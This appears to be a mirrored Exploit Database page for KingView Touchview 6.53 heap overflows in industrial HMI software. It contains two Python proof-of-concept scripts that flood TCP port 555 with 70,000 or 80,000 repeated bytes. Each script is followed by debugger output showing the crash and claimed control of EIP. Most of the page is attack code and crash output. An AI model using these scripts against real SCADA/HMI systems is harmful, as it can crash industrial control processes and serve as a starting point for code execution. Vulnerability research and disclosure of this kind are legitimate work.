Kingview Touchview 6.53 – Multiple Heap Overflow Vulnerabilities

• Exploit Database
• 112 阅读

• 作者： Carlos Mario Penagos Hollmann
  日期： 2012-06-25
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/19389/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111

  # Exploit Title: Kingview 6.53 touchview.exe heap overflow 2 # Date: June 24 2012 # Exploit Author: Carlos Mario Penagos Hollmann # Vendor Homepage: www.kingview.com   # Version: 6.53 # Tested on: Windows SP 1 # CVE :   Open kingivew click on Make choose network configuration--->network parameter , thengo to the node type and choose Local is a Login Server, run the demo port 555 will be open. NOTE: This was already patched by the vendor silently.   import os import socket import sys   host ="10.0.2.15" port = 555   exploit=("D"*70000) s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s2.connect((host,port)) s2.send(exploit) data = s2.recv(1024) s2.close()   eax=42424242 ebx=00140000 ecx=0098ffff edx=00990000 esi=00140748 edi=00000004 eip=7c902a9d esp=0012f0b8 ebp=00140748 iopl=0 nv up ei pl nz na pe nc cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010206 ntdll!tan+0xcf: 7c902a9d 8b18mov ebx,dword ptr [eax]ds:0023:42424242=????? c902a8d 55pushebp 7c902a8e 8be9mov ebp,ecx 7c902a90 8b5504mov edx,dword ptr [ebp+4] 7c902a93 8b4500mov eax,dword ptr [ebp] 7c902a96 0bc0oreax,eax 7c902a98 740cjentdll!tan+0xd8 (7c902aa6) 7c902a9a 8d4afflea ecx,[edx-1] 7c902a9d 8b18mov ebx,dword ptr [eax] ds:0023:42424242=???????? 7c902a9f f00fc74d00lock cmpxchg8b qword ptr [ebp] 7c902aa4 75f0jne ntdll!tan+0xc8 (7c902a96) 7c902aa6 5dpop ebp 7c902aa7 5bpop ebx 7c902aa8 c3ret 7c902aa9 8d4900lea ecx,[ecx] 7c902aac 8f0424pop dword ptr [esp] 7c902aaf 90nop 7c902ab0 53pushebx 7c902ab1 55pushebp       ###############################################################     # Exploit Title: Kingview Touchview EIP direct control # Date: June 24 2012 # Exploit Author: Carlos Mario Penagos Hollmann # Vendor Homepage: www.kingview.com   # Version: 6.53 # Tested on: Windows SP 1 # CVE :   Open kingivew click on Make choose network configuration--->network parameter , then go to the node type and choose Local is a Login Server, run the demo port 555 will be open. NOTE: This was already patched by the vendor silently.     import os import socket import sys   host ="10.0.2.15" port = 555   exploit=("B"*80000)         s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s2.connect((host,port)) s2.send(exploit) data = s2.recv(1024) s2.close()   7c91b1ea 8b4610 mov eax,dword ptr [esi+10h] 7c91b1ed 3bc3 cmp eax,ebx 7c91b1ef 8945fc mov dword ptr [ebp-4],eax 7c91b1f2 0f849e000000 je ntdll!RtlpUnWaitCriticalSection+0x2f (7c91b296) 7c91b1f8 8b06 mov eax,dword ptr [esi] 7c91b1fa ff4010 inc dword ptr [eax+10h] ds:0023:42424252=???????? 7c91b1fd 8b45fc mov eax,dword ptr [ebp-4] 7c91b200 83e001 and eax,1 7c91b203 8945e8 mov dword ptr [ebp-18h],eax     ntdll!RtlpWaitForCriticalSection+0x5b